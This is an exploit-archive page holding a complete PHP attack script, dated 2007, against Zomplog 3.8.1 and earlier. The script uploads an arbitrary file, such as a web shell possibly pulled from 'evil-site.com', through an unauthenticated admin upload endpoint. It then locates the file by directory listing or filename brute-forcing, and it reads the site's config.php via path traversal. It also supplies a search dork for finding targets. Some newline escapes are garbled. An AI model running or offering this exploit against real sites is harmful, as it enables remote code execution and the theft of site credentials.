Zomplog <= 3.8.1 upload_files.php Arbitrary File Upload Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Zomplog <= 3.8.1 upload_files.php Arbitrary File Upload Exploit
# Published : 2007-09-28
# Author : InATeam
# Previous Title : Public Media Manager <= 1.3 Remote File Inclusion Vulnerability
# Next Title : lustig.cms BETA 2.5 (forum.php view) Remote File Inclusion Vulnerability
<?php
## Zomplog <= 3.8.1 Arbitrary File Upload Exploit
## by InATeam (http://inattack.ru/)
## tested on versions 3.8.1 with security patch, 3.8.1, 3.8, 3.7.5

echo "------------------------------------------------------------n";
echo "Zomplog <= 3.8.1 Arbitrary File Upload Exploitn";
echo "(c)oded by Raz0r, InATeam (http://inattack.ru/)n";
echo "dork: "Powered by Zomplog"n";
echo "------------------------------------------------------------n";

if ($argc<3) {
echo "USAGE:n";
echo "~~~~~~n";
echo "php {$argv[0]} [url] [file]nn";
echo "[url]  - target server where Zomplog is installedn";
echo "[file] - file to upload (local or remote)nn";
echo "examples:n";
echo "php {$argv[0]} http://site.com/ http://evil-site.com/sh.phpn";
echo "php {$argv[0]} http://weblog.site.com:8080/ /root/sh.phpn";
echo "php {$argv[0]} http://site.com/zomplog/ sh.phpn";
die;
}
/**
* software site: http://zomplog.zomp.nl/
*
* i) /admin/upload_files.php is supposed to be run only from admin panel
* (it is included in /admin/editor.php, other admin scripts) but unathorized
* users can call it directly, because the script doesnt check if you are admin
* ii) /admin/upload_files.php allows to upload any files: it checks only
* MIME-types of the files but not the extensions. For example, it is possible
* to upload php script and then execute it
* iii) uploaded file will be moved to /upload directory and its name will
* have the format like this:
* [YearMonthDay]_[RandomNumberFrom1To999]_[OriginalFilename]
* In the version 3.8.1 additional prefix is used. By default /upload is not
* protected by .htaccess, so we can get the contents of it.
* However sometimes directory listing is denied and in this case we need to
* brute the filename (max number of requests is 999)
*/
error_reporting(0);
set_time_limit(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",10);
$url = $argv[1];
$file = $argv[2];
$url_parts = parse_url($url);
$host = $url_parts['host'];
$path = $url_parts['path'];
if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80;
$filename = basename($file);
echo "[~] Getting $filename... ";
$fp = file_get_contents($file);
$fp ? print("OKn") : die("failedn");
$data = "--------bndry31337rn";
$data.= "Content-Disposition: form-data; ";
$data.= "name="file"; filename="{$filename}"rn";
$data.= "Content-Type: text/plainrnrn";
$data.= $fp."rn";
$data.= "--------bndry31337rn";
$packet = "POST {$path}admin/upload_files.php HTTP/1.0rn";
$packet.= "Host: {$host}rn";
$packet.= "User-Agent: InAttack evil agentrn";
$packet.= "Content-Type: multipart/form-data; boundary=------bndry31337rn";
$packet.= "Content-Length: ".strlen($data)."rn";
$packet.= "Connection: closernrn";
$packet.= $data;
echo "[~] Uploading {$filename}... ";
$resp = send($packet);
$exploded = explode("rn",$resp);
$errno=array();
preg_match('@(d{3})@',$exploded[0],$errno);
if ($errno[1]!=200) $resp = false;
$resp ? print("OKn") : die("failedn");
$packet = "GET {$path}upload/ HTTP/1.0rn";
$packet.= "Host: {$host}rn";
$packet.= "User-Agent: InAttack evil agentrn";
$packet.= "Connection: closernrn";
$resp = send($packet);
if (strpos($resp, "force_download.php") !== false) {
   echo "[+] Directory listing of {$path}upload/ is allowedn";
   $matches=array();
   if (preg_match('/(temp_)*d{8}_d{1,3}_'.$filename.'/',$resp,$matches)){
       $newname = $matches[0];
       echo "[+] Filename is $newnamen";
       echo "[+] {$url}upload/{$newname}n";
   }
   else die("[-] Exploit failedn");
}
else {
   echo "[-] Directory listing of {$path}upload/ is deniedn";
   //it is necessary to determine if prefix 'temp_' is used before the filename
   echo "[~] Getting Zomplog's version... ";
   $packet = "GET {$path}upload/force_download.php?file=../admin/config.php HTTP/1.0rn";
   //thx to Dj7xpl for this bug =)
   $packet.= "Host: {$host}rn";
   $packet.= "User-Agent: InAttack evil agentrn";
   $packet.= "Connection: closernrn";
   $resp = send($packet);
   $matches=array();
   if (preg_match('@$version = "([^"]+)";@',$resp,$matches)) {
       echo $matches[1]."n";
       $prefix = ("3.8.1" == $matches[1]) ? 'temp_' : '';
   }
   else {
       echo "3.8.1 with sec patchn";
       $prefix = "temp_";       }
   echo "    Bruting the filename...";
   for($i=1;$i<1000;$i++) {
       $packet = "GET {$path}upload/".$prefix.date("Ymd")."_".$i."_";
       $packet.= urlencode($filename)." HTTP/1.0rn";
       $packet.= "Host: {$host}rn";
       $packet.= "User-Agent: InAttack evil agentrn";
       $packet.= "Connection: closernrn";
       $resp = send($packet);
       status();
       $exploded = explode("rn",$resp);
       $errno=array();
       preg_match('@(d{3})@',$exploded[0],$errno);
       if ($errno[1]==200) {
           $newname = $prefix.date("Ymd")."_".$i."_".$filename;
           echo "[+] Filename is {$newname}n";
           echo "[+] {$url}upload/{$newname}n";
           die;
       }
   }
   printf("[-] Exploit failed%9sn",'');
}
function send($packet) {
   global $host,$port;
   $ock = fsockopen(gethostbyname($host),$port);
   if (!$ock) return false;
   else {
       fputs($ock, $packet);
       $html='';
       while (!feof($ock)) $html.=fgets($ock);
   }
   return $html;
}
function status() {
   static $n;
   $n++;
   if ($n > 3) $n = 0;
   if($n==0){ print "r[-]r";  }
   if($n==1){ print "r[\]r";  }
   if($n==2){ print "r[|]r";  }
   if($n==3){ print "r[/]r"; }
}
?>

# www.Syue.com [2007-09-28]